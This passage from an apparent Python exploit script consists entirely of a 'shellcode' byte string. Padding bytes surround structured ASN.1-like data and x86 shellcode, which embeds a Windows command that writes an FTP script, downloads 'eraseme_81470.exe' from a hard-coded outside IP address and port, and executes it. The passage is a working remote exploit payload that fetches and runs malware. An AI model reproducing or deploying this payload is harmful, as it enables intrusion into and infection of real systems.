b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 967 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 968 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 969 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 970 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 971 | shellcode 
+= b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 972 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 973 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 974 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 975 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 976 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 977 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 978 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 979 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 980 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 981 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 982 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 983 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 984 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 985 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 986 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 987 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 988 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 989 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 990 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 991 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 992 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 993 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 994 | 
shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 995 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 996 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 997 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 998 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 999 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1000 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1001 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1002 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1003 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1004 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1005 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1006 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1007 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1008 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1009 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1010 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1011 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1012 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1013 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1014 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1015 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1016 | shellcode += 
b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1017 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1018 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1019 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x03\x00\x23\x82\x0c\x57\x03" 1020 | shellcode += b"\x82\x04\x0a\x00\x90\x42\x90\x42\x90\x42\x90\x42\x81\xc4\x54\xf2" 1021 | shellcode += b"\xff\xff\xfc\xe8\x46\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01" 1022 | shellcode += b"\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\xe3\x2e\x49\x8b\x34\x8b\x01" 1023 | shellcode += b"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4" 1024 | shellcode += b"\x3b\x54\x24\x04\x75\xe3\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b" 1025 | shellcode += b"\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\x04\xc3\x31\xc0" 1026 | shellcode += b"\x64\x8b\x40\x30\x85\xc0\x78\x0f\x8b\x40\x0c\x8b\x70\x1c\xad\x8b" 1027 | shellcode += b"\x68\x08\xe9\x0b\x00\x00\x00\x8b\x40\x34\x05\x7c\x00\x00\x00\x8b" 1028 | shellcode += b"\x68\x3c\x5f\x31\xf6\x60\x56\xeb\x0d\x68\xef\xce\xe0\x60\x68\x98" 1029 | shellcode += b"\xfe\x8a\x0e\x57\xff\xe7\xe8\xee\xff\xff\xff\x63\x6d\x64\x20\x2f" 1030 | shellcode += b"\x6b\x20\x65\x63\x68\x6f\x20\x6f\x70\x65\x6e\x20\x32\x31\x37\x2e" 1031 | shellcode += b"\x32\x33\x32\x2e\x39\x32\x2e\x36\x34\x20\x32\x30\x31\x33\x39\x20" 1032 | shellcode += b"\x3e\x20\x69\x26\x65\x63\x68\x6f\x20\x75\x73\x65\x72\x20\x31\x20" 1033 | shellcode += b"\x31\x20\x3e\x3e\x20\x69\x20\x26\x65\x63\x68\x6f\x20\x67\x65\x74" 1034 | shellcode += b"\x20\x65\x72\x61\x73\x65\x6d\x65\x5f\x38\x31\x34\x37\x30\x2e\x65" 1035 | shellcode += b"\x78\x65\x20\x3e\x3e\x20\x69\x20\x26\x65\x63\x68\x6f\x20\x71\x75" 1036 | shellcode += b"\x69\x74\x20\x3e\x3e\x20\x69\x20\x26\x66\x74\x70\x20\x2d\x6e\x20" 1037 | shellcode += b"\x2d\x73\x3a\x69\x20\x26\x65\x72\x61\x73\x65\x6d\x65\x5f\x38\x31" 1038 | shellcode += 
b"\x34\x37\x30\x2e\x65\x78\x65\x0d\x0a\x00\x42\x42\x42\x42\x42\x42" 1039 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1040 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1041 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1042 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1043 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1044 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1045 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1046 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1047 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1048 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1049 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1050 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1051 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1052 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1053 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1054 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1055 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1056 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1057 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1058 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1059 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1060 | shellcode += 
b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1061 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1062 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1063 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1064 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1065 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1066 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1067 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1068 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1069 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1070 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1071 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1072 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1073 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1074 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1075 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1076 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1077 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1078 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1079 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1080 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1081 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1082 | shellcode += 
b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1083 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1084 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x23\x0a\x03" 1085 | shellcode += b"\x08\x00\xf8\x0f\x01\x00\xf8\x0f\x01\x23\x82\x08\x39\x03\x82\x04" 1086 | shellcode += b"\x11\x00\x43\x43\x43\x43\x20\xf0\xfd\x7f\x53\x56\x57\x66\x81\xec" 1087 | shellcode += b"\x80\x00\x89\xe6\xe8\xed\x00\x00\x00\xff\x36\x68\x09\x12\xd6\x63" 1088 | shellcode += b"\xe8\xf7\x00\x00\x00\x89\x46\x08\xe8\xa2\x00\x00\x00\xff\x76\x04" 1089 | shellcode += b"\x68\x6b\xd0\x2b\xca\xe8\xe2\x00\x00\x00\x89\x46\x0c\xe8\x3f\x00" 1090 | shellcode += b"\x00\x00\xff\x76\x04\x68\xfa\x97\x02\x4c\xe8\xcd\x00\x00\x00\x31" 1091 | shellcode += b"\xdb\x68\x10\x04\x00\x00\x53\xff\xd0\x89\xc3\x56\x8b\x76\x10\x89" 1092 | shellcode += b"\xc7\xb9\x10\x04\x00\x00\xf3\xa4\x5e\x31\xc0\x50\x50\x50\x53\x50" 1093 | shellcode += b"\x50\xff\x56\x0c\x8b\x46\x08\x66\x81\xc4\x80\x00\x5f\x5e\x5b\xff" 1094 | shellcode += b"\xe0\x60\xe8\x23\x00\x00\x00\x8b\x44\x24\x0c\x8d\x58\x7c\x83\x43" 1095 | shellcode += b"\x3c\x05\x81\x43\x28\x00\x10\x00\x00\x81\x63\x28\x00\xf0\xff\xff" 1096 | shellcode += b"\x8b\x04\x24\x83\xc4\x14\x50\x31\xc0\xc3\x31\xd2\x64\xff\x32\x64" 1097 | shellcode += b"\x89\x22\x31\xdb\xb8\x90\x42\x90\x42\x31\xc9\xb1\x02\x89\xdf\xf3" 1098 | shellcode += b"\xaf\x74\x03\x43\xeb\xf3\x89\x7e\x10\x64\x8f\x02\x58\x61\xc3\x60" 1099 | shellcode += b"\xbf\x20\xf0\xfd\x7f\x8b\x1f\x8b\x46\x08\x89\x07\x8b\x7f\xf8\x81" 1100 | shellcode += b"\xc7\x78\x01\x00\x00\x89\xf9\x39\x19\x74\x04\x8b\x09\xeb\xf8\x89" 1101 | shellcode += b"\xfa\x39\x5a\x04\x74\x05\x8b\x52\x04\xeb\xf6\x89\x11\x89\x4a\x04" 1102 | shellcode += b"\xc6\x43\xfd\x01\x61\xc3\xa1\x0c\xf0\xfd\x7f\x8b\x40\x1c\x8b\x58" 1103 | shellcode += b"\x08\x89\x1e\x8b\x00\x8b\x40\x08\x89\x46\x04\xc3\x60\x8b\x6c\x24" 1104 | shellcode += 
b"\x28\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20" 1105 | shellcode += b"\x01\xeb\xe3\x38\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0\xfc\xac" 1106 | shellcode += b"\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c\x24\x24\x75" 1107 | shellcode += b"\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b" 1108 | shellcode += b"\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc2\x08\x00\xeb\xfe\x43\x43" 1109 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1110 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1111 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1112 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1113 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1114 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1115 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1116 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1117 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1118 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1119 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1120 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1121 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1122 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1123 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1124 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1125 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1126 | shellcode += 
b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1127 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1128 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1129 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1130 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1131 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1132 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1133 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1134 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1135 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1136 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1137 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1138 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1139 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1140 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1141 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1142 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1143 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1144 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1145 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1146 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1147 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1148 | shellcode += 
b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1149 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1150 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1151 | shellcode += b"\x43\x43\x23\x82\x04\x20\x03\x09\x00\xeb\x06\x90\x90\x90\x90\x90" 1152 | shellcode += b"\x90\x03\x82\x04\x11\x00\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1153 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1154 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1155 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1156 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1157 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1158 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1159 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1160 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1161 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1162 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1163 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1164 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1165 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1166 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1167 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1168 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1169 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1170 | shellcode += 
b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1171 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1172 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1173 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1174 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1175 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1176 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1177 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1178 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1179 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1180 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1181 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1182 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1183 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1184 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1185 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1186 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1187 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1188 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1189 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1190 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1191 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1192 | shellcode += 
b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1193 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1194 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1195 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1196 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1197 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1198 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1199 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1200 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1201 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1202 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1203 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1204 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1205 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1206 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1207 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1208 | shellcode 